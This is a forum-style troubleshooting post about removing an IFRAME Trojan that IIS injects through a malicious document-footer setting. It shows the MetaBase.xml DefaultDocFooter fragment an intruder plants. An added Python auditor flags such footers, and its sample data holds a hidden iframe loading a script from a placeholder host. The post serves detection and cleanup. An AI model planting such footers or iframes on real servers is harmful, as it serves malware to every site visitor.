How to fix a server that injects an IFRAME Trojan into every page (not an IIS mapping change or an ARP virus, and the IFRAME code is not present in the source of the web page files)

Source: Internet
Author: User

Today I visited a company website and found that the page was not right. Right-clicking to view the HTML source showed an IFRAME loading a JS file from another website. Needless to say, it had been infected.

I went to the server and read the files. The IFRAME code is not in the source at all, yet the IFRAME code is being added automatically to every website on the server.

My first thought was that the IIS mapping had been modified. I checked it.

Nothing in it had been modified.

Then I remembered the same problem on the school website back when I was in college. That one was caused by a rampant ARP virus: the virus was not on the machine itself but on an infected machine on the same network. So I suggested installing an ARP firewall. Searching online, I also read that it may be caused by the web service extensions in IIS, so I looked at those again and found nothing wrong.

Finally I noticed something abnormal, and that is where I fixed the problem, for the time being (a DLL or EXE in the system may be the virus, and the system needs a proper antivirus scan; the server is not mine to manage, so I had to leave it at that).

Here is what I found:

The Document Footer option was enabled in the website properties, with an HTM file attached. I opened c:\windows\system32\com\iis.htm in a text editor and found this IFRAME code inside it. This HTM file is not a normal one, so I turned off the document footer and deleted the HTM file. That solved the problem temporarily (the system may still carry a virus, so this is only a stopgap).

Many people online say their servers are hit by ARP viruses, an "IIS tail" (the document footer), and so on. If you have not been able to solve it, take a look at this write-up; I hope it helps.

I used to dabble in this for a while, but I have not touched it in a long time. Following this JS file, I found many HTM files on the malware-hosting sites and downloaded them; if you have time, analyze them. And if you are not too busy, scan the server and help it find the backdoor :)


------------------------------

After reading the above, it is clear that the Trojan only has to insert one fragment into C:\windows\system32\inetsrv\MetaBase.xml (C: being the system drive), for example:

    <IIsWebVirtualDir Location="/LM/W3SVC/81120797/ROOT"
        AccessFlags="AccessRead | AccessScript"
        AppFriendlyName="Default Application"
        AppIsolated="2"
        AppRoot="/LM/W3SVC/81120797/ROOT"
        AuthFlags="AuthAnonymous | AuthNTLM"
        DefaultDocFooter="file:c:\windows\system32\com\aa.htm"
        <!-- remaining attributes of the node unchanged -->
    />

As shown above, pointing DefaultDocFooter at an HTM file that carries the Trojan (here DefaultDocFooter="file:c:\windows\system32\com\aa.htm") is all it takes: once the footer is enabled (the EnableDocFooter property, which the "Enable document footer" checkbox in IIS Manager sets), IIS appends that file to every HTML page it serves from that node, which is why the IFRAME shows up in the browser but not in any page file on disk. Two things worth checking when you clean this up: metabase properties are inherited, so a footer set on a parent node such as /LM/W3SVC affects every site on the server, not just the one whose ROOT you looked at; and writing to MetaBase.xml requires administrator rights on the machine, so finding such an entry means the server has already been compromised at that level, and clearing the footer removes the symptom, not the intruder. There is nothing difficult about it, but now that you know the principle, don't use it to do damage. :)
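To turn the explanation above into a repeatable check, here is an added example (not code from the original post) that audits a MetaBase.xml for DefaultDocFooter settings, resolves FILE: footers to their path, and flags any iframe or script tag with a src inside the footer. The metabase text and the footer file contents are constructed inline and modelled on the fragment quoted above (same site id and footer path); the host example.invalid is a placeholder, and the `files` dict stands in for reading the paths from disk so the script runs offline.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample MetaBase.xml, modelled on the fragment quoted in the post
# (same site id and footer path). It is NOT a capture from a real server.
SAMPLE_METABASE = """<?xml version="1.0"?>
<configuration xmlns="urn:microsoft-catalog:XML_Metabase_V64_0">
 <MBProperty>
  <IIsWebServer Location="/LM/W3SVC/81120797" ServerComment="Company site" />
  <IIsWebVirtualDir Location="/LM/W3SVC/81120797/ROOT"
      AccessFlags="AccessRead | AccessScript"
      AppFriendlyName="Default Application"
      AppIsolated="2"
      AppRoot="/LM/W3SVC/81120797/ROOT"
      AuthFlags="AuthAnonymous | AuthNTLM"
      EnableDocFooter="TRUE"
      DefaultDocFooter="file:c:\\windows\\system32\\com\\aa.htm" />
  <IIsWebVirtualDir Location="/LM/W3SVC/1/ROOT"
      AccessFlags="AccessRead | AccessScript"
      DefaultDocFooter="STRING:&lt;hr&gt;Copyright 2008" />
 </MBProperty>
</configuration>
"""

# Constructed stand-in for the files on disk; the footer file carries a hidden
# iframe of the kind the post describes (example.invalid is a reserved name).
SAMPLE_FILES = {
    r"c:\windows\system32\com\aa.htm":
        '<iframe src="http://example.invalid/m.js" width=0 height=0></iframe>',
}

# iframe/script elements that pull content from a src attribute
INJECT_RE = re.compile(
    r"<\s*(iframe|script)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def find_doc_footers(xml_text):
    """Return every node in MetaBase.xml that sets DefaultDocFooter.

    Attribute names are not namespaced, so a plain attrib lookup works
    regardless of the catalog namespace declared on <configuration>.
    """
    hits = []
    for el in ET.fromstring(xml_text).iter():
        footer = el.attrib.get("DefaultDocFooter")
        if footer is None:
            continue
        hits.append({
            "location": el.attrib.get("Location", "?"),
            "footer": footer,
            # EnableDocFooter is inheritable: absent here means inherited.
            "enabled": el.attrib.get("EnableDocFooter", "inherited"),
        })
    return hits


def footer_file(footer_value):
    """Path of a FILE: footer, or None for a STRING: footer."""
    kind, sep, rest = footer_value.partition(":")
    if sep and kind.strip().upper() == "FILE":
        return rest.strip()
    return None


def scan_footer_markup(markup):
    """(tag, src) for every iframe/script in the footer that loads a src."""
    return [(tag.lower(), src) for tag, src in INJECT_RE.findall(markup)]


def audit_metabase(xml_text, files):
    """Footer settings -> footer file -> injected tags, as one report.

    `files` maps lower-cased paths to contents so the audit runs offline;
    on a real server build it by reading each path that footer_file() returns.
    """
    report = []
    for hit in find_doc_footers(xml_text):
        path = footer_file(hit["footer"])
        if path is None:
            # Inline STRING: footers are scanned directly.
            markup = hit["footer"].partition(":")[2]
        else:
            markup = files.get(path.lower(), "")
        hit["path"] = path
        hit["injected"] = scan_footer_markup(markup)
        report.append(hit)
    return report


if __name__ == "__main__":
    for entry in audit_metabase(SAMPLE_METABASE, SAMPLE_FILES):
        flag = "SUSPICIOUS" if entry["injected"] else "ok"
        print(f'{flag:10} {entry["location"]} footer={entry["footer"]} '
              f'enabled={entry["enabled"]} injected={entry["injected"]}')
```

On a live IIS 6 box, feed it the contents of %SystemRoot%\system32\inetsrv\MetaBase.xml and a dict built from the footer paths it reports; walking every node with `iter()` rather than only the site's ROOT is deliberate, since a footer set on /LM/W3SVC is inherited by all sites.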
